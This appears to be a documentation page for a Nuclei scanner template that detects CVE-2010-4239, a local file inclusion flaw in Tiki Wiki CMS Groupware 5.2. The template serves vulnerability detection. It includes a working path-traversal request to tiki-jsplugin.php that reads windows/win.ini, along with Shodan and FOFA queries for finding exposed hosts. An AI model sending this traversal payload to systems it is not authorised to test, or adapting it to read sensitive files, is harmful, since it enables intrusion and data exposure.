Tiki Wiki CMS Groupware 5.2 - Local File Inclusion
ID: CVE-2010-4239
Severity: critical
Author: 0x_akoko
Tags: cve,cve2010,tikiwiki,lfi,tiki
Description
Section titled “Description”Tiki Wiki CMS Groupware 5.2 is susceptible to a local file inclusion vulnerability.
YAML Source
Section titled “YAML Source”id: CVE-2010-4239
info: name: Tiki Wiki CMS Groupware 5.2 - Local File Inclusion author: 0x_akoko severity: critical description: Tiki Wiki CMS Groupware 5.2 is susceptible to a local file inclusion vulnerability. impact: | The LFI vulnerability can lead to unauthorized access to sensitive files, potentially exposing sensitive information or allowing for further exploitation. remediation: | Upgrade Tiki Wiki CMS Groupware to a version that is not affected by the CVE-2010-4239 vulnerability. reference: - https://dl.packetstormsecurity.net/1009-exploits/tikiwiki52-lfi.txt - https://www.openwall.com/lists/oss-security/2010/11/22/9 - https://security-tracker.debian.org/tracker/CVE-2010-4239 - https://nvd.nist.gov/vuln/detail/CVE-2010-4239 - https://access.redhat.com/security/cve/cve-2010-4239 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2010-4239 cwe-id: CWE-20 epss-score: 0.02675 epss-percentile: 0.90421 cpe: cpe:2.3:a:tiki:tikiwiki_cms\/groupware:5.2:*:*:*:*:*:*:* metadata: max-request: 1 vendor: tiki product: tikiwiki_cms\/groupware shodan-query: http.html:"tiki wiki" fofa-query: body="tiki wiki" tags: cve,cve2010,tikiwiki,lfi,tiki
http: - method: GET path: - "{{BaseURL}}/tiki-jsplugin.php?plugin=x&language=../../../../../../../../../../windows/win.ini"
matchers: - type: word part: body words: - "bit app support" - "fonts" - "extensions" condition: and# digest: 490a00463044022010d9c5577144dfd29a5be721e7f59cd6353368fe8fc933b6f2c65d9ba89d6d4e022016ff16c665f60cb39c054d65eb3063904dd1187ecf31e39bf2b289849333abaa:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2010/CVE-2010-4239.yaml"